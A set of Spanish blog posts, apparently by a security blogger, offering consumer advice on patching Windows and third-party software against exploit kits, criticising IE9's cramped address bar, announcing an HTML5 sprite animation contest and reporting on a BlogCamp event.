Lo primero y más importante que tienes que hacer es tener tu sistema operativo lo más moderno posible en todos los sentidos. Vivir con un Windows XP es convivir con un sistema operativo que empezó a diseñarse en 1996 y que no está preparado para las amenazas de más de 10 años después. Tecnologías de seguridad como ASLR, MIC, UIPI o Virtual Store, por citar alguna de las “enecientas” medidas de seguridad que complican la vida a los atacantes, no existen en Windows XP. Si tienes un Windows Vista pone el último Service Pack disponible y si tienes Windows 7, en cuanto tengamos disponible el Service Pack 1, instálalo. Estas cosas no salen por ganas del fabricante de distribuir software, sino para arreglar problemas.

Ten en cuenta que, en la primera Botnet multiplataforma que se ha desplegado este año, Windows Vista y Windows 7 tuvieron menos infecciones que incluso Mac OS, mientras que Windows XP seguía siendo “el campeón”.


Imagen 5: Distribución de bots por sistema operative de la botnet multiplataforma
Windows Update Up and running

En Segundo lugar, activa Windows Update en tu computadora. Elige la forma en la que quieres instalar el software, pero que sea lo más rápido mejor. Para ello entra en el Centro de Seguridad y selecciona la opción de que te avise o de que se instale automáticamente. Cómo tú prefieras. Yo te recomiendo que elijas la opción de que se instale automáticamente, tendrás que luchar menos contra la pereza que a veces nos da esperar la descarga e instalar el software, y que solo elijas la otra opción si estás de viaje con conexiones limitadas mucho tiempo.


Imagen 6: Opciones de Windows Update en Windows 7
¿Y el resto del software de tu equipo?

He aquí un gran problema. Windows Update es una solución perfecta para mantener tu sistema actualizado… siempre que tu software sea parte del sistema operativo. Eso quiere decir que todo ese software que no es parte del sistema operativo o Windows no se va a actualizar por medio de Windows Update. Hay que preocuparse también de él, y tendrá que ser por otro camino.

A ese tipo de software, del que seguramente tengas instalado mucho en tu sistema, también le atacan. Si tienes un Firefox , Safari o Google Chrome, tal y como has visto en la parte de kits de exploits, pero no se escapan los ataques a WinAmp, QuickTime o Acrobat Reader. Es por esto que hay que mantenerlo actualizado, como Dios manda.

La mayoría de estos programas ya vienen cargado con un módulo de actualización automática que te avisa – como en el caso de Firefox – cuando hay una actualización, o que realiza lo que se llama una actualización “silenciosa” – como el caso de Google Chrome – es decir, te actualiza el software sin decirte nada.


Imagen 7: Actualizador de Firefox en Windows 7
Un Windows Update para el resto del software

Sin embargo, las opciones de actualización “una a una” suelen ser bastantes tediosas. El problema es que algunas solo se activan cuando arrancas el software, lo que hace que si tienes el programa sin arrancar hasta que llega el exploit, entonces de nada sirven. Otras, por el contrario, instalan un agente, como en el caso de Java, que está consumiendo recursos del sistema constantemente.

La solución es conseguir tener un único agente que monitorice el software completo y que compruebe él cuando existe una actualización de algunos de los programas que tienes instalados en el sistema, y eso existe.

Secunia Personal Software Inspector

Hay muchas soluciones, pero la que yo te recomiendo, que es gratuita y funciona de maravilla es Secunia PSI. La herramienta la puedes descargar desde la siguiente URL y te detectará todo el software que tienes vulnerable en el sistema, ya sea porque existe un parche que aún no has aplicado, bien porque existe un fallo conocido del que aún no hay solución para un determinado programa, por lo que tendrás que extremar las precauciones con él.


Imagen 8: Informe de resultados en Secunia PSI
Huir a otros sistemas

¡Ah!, y si piensas que por huir a otros sistemas estás a salvo, vas dado. En todas las plataformas hay que actualizar y mantener el sistema completamente al día, ya que si no cuidas tu sistema, otro, desde Internet, lo va a reclamar para sus dominios. Así que… ¡Actualiza tu software!

*********************************************************************************************
- Mantén tu sistema al día o entrégalo al enemigo (1 de 2)
- Mantén tu sistema al día o entrégalo al enemigo (2 de 2)
*********************************************************************************************

Mantén tu sistema al día o entrégalo al enemigo (1 de 2)

*********************************************************************************************
- Mantén tu sistema al día o entrégalo al enemigo (1 de 2)
- Mantén tu sistema al día o entrégalo al enemigo (2 de 2)
Artículo escrito para la Revista Windows Oficial de Febrero de 2011
*********************************************************************************************

Sí, lo sé, es una tarea a veces tediosa y molesta la de parchear el sistema y tener que reiniciar cuando menos te lo esperas, pero también lo es hacer copias de seguridad y espero, por tu bien, que tengas hecho los deberes y hayas pensado en un plan de salvaguarda de datos que estés cumpliendo a rajatabla.

Parchear un sistema es algo absolutamente necesario, tengas el sistema que tengas y la plataforma hardware que tengas. No importa que tu vecino tenga un Mac OS X o que tú tengas un Windows Phone, hay que parchear todas las plataformas.

Al principio fue el bug

¿Y por qué hay que parchear? Pues por algo tan sencillo como que los sistemas software tienen vulnerabilidades que pueden ser aprovechadas para comprometer la seguridad de tu equipo y la tuya personal. Es así de sencillo y así de duro.

Todas las empresas que tienen equipos de seguridad hacen informes resúmenes anuales en los que recogen su visión de la seguridad durante un cierto periodo de tiempo. Microsoft saca el SIR (Security Intelligence Report) cada 3 meses, por ejemplo. En el informe de seguridad relativo al 2010 de CISCO salía una gráfica por fabricantes de software en la que se podía ver como las vulnerabilidades de los sistemas operativos Apple asciende a más de 350 durante ese año. No, no es de extrañar, solo Mac OS X tuvo 308 vulnerabilidades mientras que los sistemas de iPhone e iPad alcanzaron 60 vulnerabilidades.



Imagen 1: Grafico de vulnerabilidades por fabricante de software
Estos fallos de seguridad se conocen como bugs o vulnerabilidades y un atacante podría hacer algo tan malo como instalarte un troyano que encienda tu webcam y te espíe en tu intimidad sin ni tan siquiera recibir un mensaje de seguridad ni cuando se instala, ni cuando enciende tu webcam, ni cuando envía toda esta información al atacante. Sí, puede pasar, y cualquiera que te diga lo contrario o te engaña o desconoce realmente cómo funciona el malware hoy en día.

¿Quién descubre los bugs?

Un bug, como podréis imaginar, puede llegar a ser algo muy valioso. Hay fallos de seguridad por los que las mafias, intermediarios de ¿gobiernos? ¿grupos de interés?... pueden pagar hasta 100.000 dolares - y algunos concretos algo más-. Sí, las cantidades llegan a ser espeluznantes. El que encuentra un bug serio puede tener un tesoro. Pero no siempre es tan fácil encontrarlos, y muchas veces lo encuentran profesionales que no quieren tu mal o que, directamente, trabajan en el propio fabricante de software. El peor de los escenarios que se puede encontrar un fabricante es que un bug esté siendo utilizado activamente en Internet, antes incluso, de que ellos tengan constancia de él.

En cualquier caso, una vez que el fabricante tiene constancia de que existe dicho bug, hay que solucionarlo… ¿y cómo se va a hacer? Pues sencillo, mediante un parche que vendrá en alguna actualización del software afectado.

Hotfixes, Parches, Rollups y Service Packs

Cada fabricante utiliza una diferente terminología para denominar a las diferentes soluciones que desarrolla para arreglar un bug. En el caso de Microsoft, los hotfixes son para entornos muy específicos en los que únicamente si se da el caso del entorno concreto deben aplicarse. Habitualmente se sacan para empresas con software de otros fabricantes con el que interactúa mal algún componente del sistema. Para un entorno particular no suele haber hotfixes - salvo para algún accesorio “raruno” -.

Los Rollups son acumulados que se crean para que a los técnicos les sea más fácil la dura vida – creedme, no hubieran hecho la serie IT Crowd si ser informático fuera una bicoca -. Estos recogen en un único ejecutable varios parches y hotfixes, con lo que un técnico no tiene que instalar 10 ejecutables y le es suficiente con un Rollup.

Para los usuarios domésticos, lo más habitual son los parches, o “actualizaciones”, que están disponibles a través de los Microsoft Update Services y, cada año o dos años, los Service Packs.

Windows Update

Para los productos de la plataforma Microsoft, la actualización suele ser bastante cómoda, basta con activar los servicios de Windows Update y NO desactivarlos nunca. Si tienes a alguien cerca que te dice que desactives eso, directamente ignórale.

Ten en cuenta que en el momento en que aparece un parche que soluciona un problema de un programa, está marcando el lugar exacto donde estaba el fallo. Los especialistas en la creación de exploits (herramientas que sacan provecho de los bugs) encuentran los fallos con mucha facilidad cuando tienen el programa que lo soluciona. Basta con que comparen ficheros sin parchear y parcheados y buscar las diferencias, en una de ellas estará el fallo original, con lo que harán, en menos de 24 horas en la mayoría de los caso, el exploit que les permitirá atacar los sistemas sin parchear.

Kits de explotación

Para que a la mafia "rusa", "ucraniana" o "búlgara" de turno, que quiera robarte dinero o utilizar tu equipo para atacar a otros, le sea mucho más fácil, se comercializan por Internet kits de explotación, es decir, utilidades que aglutinan una buena cantidad de exploits y que sirven para infectar máquinas a diestro y siniestro por Internet.

El funcionamiento suele ser muy sencillo ya que estos kits se especializan en vulnerabilidades de seguridad de navegadores de Internet y les basta con poner los exploits en servidores web por Internet y engañarte - con Spam, presentaciones en Power Point con muchos links “bonitos” o mediante ataques a otras páginas web – para que visites la página donde han puesto el exploit. Si no tienes parche instalado… gameover, acabas de convertir tu equipo en un zombie de The walking deads.



Imagen 2: Kit de Exploits Black Hole, en perfecto Ruso
Esto, que tal vez te parezca raro, se hace masivamente y a diario, e incluso sitios de renombre y posting, como la misma página web de iTunes de Apple, es vulnerada para atacar sistemas. En este caso, cayó en la saca de una mafia rusa durante el mes de Agosto de 2010.



Imagen 3: Apple.com distribuyendo exploits desde Rusia
Para que te hagas una ligera idea de cómo se las gasta la industria buscando vulnerabilidades útiles para estos menesteres, la empresa Bit9 se dedica a contabilizar anualmente las vulnerabilidades Critical y Highly Critical descubiertas en software. Este año sacó en Octubre la Dirty Dozen y en ella ha salido que Google Chrome, Mozilla Firefox, Apple Safari e Internet Explorer estaban en ella, con muy malos resultados.



Imagen 4: La dirty Dozen
*********************************************************************************************
- Mantén tu sistema al día o entrégalo al enemigo (1 de 2)
- Mantén tu sistema al día o entrégalo al enemigo (2 de 2)
*********************************************************************************************

Demasiado minimalista para mi gusto

Desde hace un poco de tiempo trabajo con la última versión de IE9 y estoy muy contento con la herramienta en cuando a su rendimiento y las nuevas funcionalidades. Sin embargo, hay una cosa que no me gusta y creo que habría que ver como arreglarlo. El excesivo mimimalismo en la visualización de las opciones del navegador.

Sí, sé que es una tendencia muy social, muy tablet, muy iPad, muy mobile y muy cool lo de aprovechar al máximo de la zona de visualización del contenido, pero ya con iOS se ha demostrado que un exceso de minimalismo puede ser una cagada para la seguriad, como el phishing en iPhone. Además, para tener todo el espacio ya tenemos los usuarios la opción de utilizar la vista F11 a pantalla completa y el Ctrl+Tab para ir pasando pestañas, si tan crucial fuera aprovechar al máximo la zona de renderizado de la página. Sin embargo, el que por defecto todos los elementos del navegador compitan por el mismo espacio lo considero un detrimento en la seguridad.

Al final, en la anchura de la pantalla tienen que entrar los botones de Ir Atrás, Ir Adelante, Vista Compatibilidad, Actualizar, Cerrar Pestaña, Favoritos, Inicio y Herramientas con lo que es peor, el Espacio de las Pestañas y la Barra de direcciones, con el Icono de la web y la Información del certificado digital. ¿Conclusión? Pues que la dirección del servidor casi no se ve.

En una resolución de 800X600 yo casi no veo la dirección, tal y como se puede ver en la imagen siguiente.


Figura 1: Visualización en 800x600
Pero la cosa se complica, cuando se muestra la información del certificado digital. En una resolución de 1024X768 el espacion que queda para la barra de direcciones es para llorar.


Figura 2: Visualización en 1024x768
Sí, se lo podemos quitar al de las pestañas, pero... ¿entonces quién ve las pestañas? Esta competitividad por maximizar el espacio de visualización de la página hace que los ataques basados en URLS como son los XSS, los phishing o los de tabnabbing sean mucho más difíciles de detectar. Además, el que por defecto la barra de estado no esté activada ayuda más bien poco a la hora de detectar un ataque de Phishing. Es cierto que se está trabajando en contra de los ataques dirigidos por URL con SmartScreen y que sus protecciones están dando muy buenos resultados, pero para alguien como yo que lleva la webcam tapada con un papel, cualquier medida es poca.

Yo tengo una computadora con un monitor panorámico, y me sobra espacio por los lados en la mayoría de las páginas web para aburrir. ¿No puedo configurarme las pestañas a un lado? Vamos, como cuando me dejo los favoritos pegados a un lateral ¡me gusta esa feature para mi monitor panorámico! ¿Habrá que hacer un addin para mover las pestañas o mostrar mejor la barra de direcciones?

Saludos Malignos!

Sprite Animation Contest

Tras el éxito que fue ver la creatividad de todos los asistentes al BlogCamp! en la creación de animaciones con el sencillo motor que habíamos preparado en HTML5 para Internet Explorer 9, nos pareció buena idea hacer un concurso para estas navidades y que algunos se lleven una XBOX 360 como regalo de navidades. Y así nació el Sprite Animation Contest.


El objetivo es realizar una animación de hasta 3 minutos en las que utilices la potencia de HTML para conseguir un objetivo. Enseñar a los demás las novedades del nuevo Windows Live Mail.

La prueba: Para ello, te vamos a enseñar a animar con sprites, el método clásico de animación en videojuegos de los 80, en el que podrás aprender a mover personajes y objetos por la pantalla. Con este fin hemos preparado un sencillo motor en HTML 5 que te ayudará a empezar a trabajar, pero tú puedes adaptarlo a tus necesidades e incluso conseguir cosas increibles. Eso sí, tiene que funcionar en Internet Explorer 9, ya sabes, el que ha sacado mejores resultados en los tests del W3C.

Para que aprendas, haremos un Webcast el próximo día 25 de Noviembre donde te enseñaremos los entresijos de como hacer este tipo de animaciones. Tienes que registrarte previamente para participar en el webcast.

Premios: Se darán tres consolas XBOX a los que ganen en las siguientes categorías:

- Mejor consecución de objetivos: Este premio se dará a la animación que mejor consiga aunar los objetivos de mostrar las novedades de Windows Live con la más cuidada animación.

- Mejor animación técnica: Aquella que consiga aunar mayor destreza técnica, artística y elegancia.

- Animación más divertida: Aquella que, con humor, mejor consiga expresar las ideas del concurso.

Este concurso está destinado solo a estudiantes, así que, si no eres estudiante... apúntate a aprender algo o tendremos que banearte (ya sabes que va por ti). Eso sí, al webcast y al motor podrás acceder y hacerte tus propias animaciones. Tienes más informaicón en Sprite Animation Contest.

Saludos Malignos!

Animaciones HTML 5 en BlogCamp

Durante el Blogcamp tuvimos un par de pruebas de trabajo en grupo para dirimir qué 4 se llevaban las XBoxes, qué grupos se llevaban los libros de SEO, RSS y 101 Secretos para mejorar su web y qué 4 se llevaban los libros de montar un Windows Sever 2008 R2 failover Cluster for Dummies.

La primera de ellas consisitó en crimpar unos cables para hacer un cable RJ45 directo, otro cruzado, otro fue un cable RJ-11 y el último un cable híbrido con servicio redes y teléfono. Uno de los grupos lo entendió mal, y creó el cable Hidra, en el que, en lugar de 2 cabezas en cada lado, había 1 cabeza en un lado y 3 en el otro. No sé en que gaitas pensaban, pero el cable creo expectación.


Aquí más fotos
Para terminar de conseguir los puntos les llevamos un motor en HTML 5 para animar, al viejo estilo. Para ello el motor lleva un bucle de frames al infinito central en el que se lanzan movimientos en cada instante de tiempo. El ejemplo elegido fue el Double Dragon, y los grupos tuvieron que modificar el código y lo que quisieron para hacer la animación que más puntos ganase de sus compañeros. Aquí os dejo tres que me gustaron a mí.

Linux - BlogCamp from ts ds on Vimeo.

Tecnicoless - BlogCamp from ts ds on Vimeo.

Skynet - BlogCamp from ts ds on Vimeo.

Bueno, sin palabras, cada uno tiene su cosa. Todo está hecho en HTML5 sobre Internet Explorer 9 y seguramente os dejemos descargar el mini-motor, por si quieres hacer tú, tu propia animación. Lo cierto es que nos lo hemos pasado debuti. Nos vemos en la que montemos para el Asegúr@IT Camp 2!

Saludos Malignos!

BlogCamp: Momentos

Anoche comenzamos la andadura con el BlogCamp, donde nos hemos juntado 35 enganchados a las tecnologías. Como casi todos tienen cuenta de twitter, puedes segurir todo lo que está pasando minuto a minuto en la búsqueda del hashtag de #Blogcamp. De ahí, he tomado algunas de las foros que han subido, para que véis en que consiste la cosa.

Primero la cena de ayer. Un par de mesas en las que nos pusimos gochos de fritos, embutidos y comidas grasas....


Cena light de la mesa número 1
Después de las copas de ayer (los que las tomaron), hay que despertarse en las cabañas para ir a las charlas. Antes desayunaco de tostadas, café, bollos y zumos.


Niditos de amor nocturnos.. ¿qué habrán pasado ahí por la noche?
La bienvenida la ha hecho Fernando Guilltot, de Spectra, y yo he estado ayudándole. Ambos disfrazados de Josemaricariño.


Fernando Guillot abriendo el evento
Después de una primera charla sobre la novedades de Hotmail, han tenido la primera prueba de habilidad para demostrar que no son unos técnicoless: Hacer 4 cables de red y teléfono.


Los chicos de Cyberhades "crimpandose"
Los ganadores se llevarán 1 XBOX por persona, así que hay que hacerlo bien.

De ahi nos hemos ido a re-desayunar otra vez y ahora están con la charla de HTML 5... y la cosa promete que alguno ya se está animando. Si es que los findes de semana sin ordenadores no serían fines de semana...

Saludos Malignos!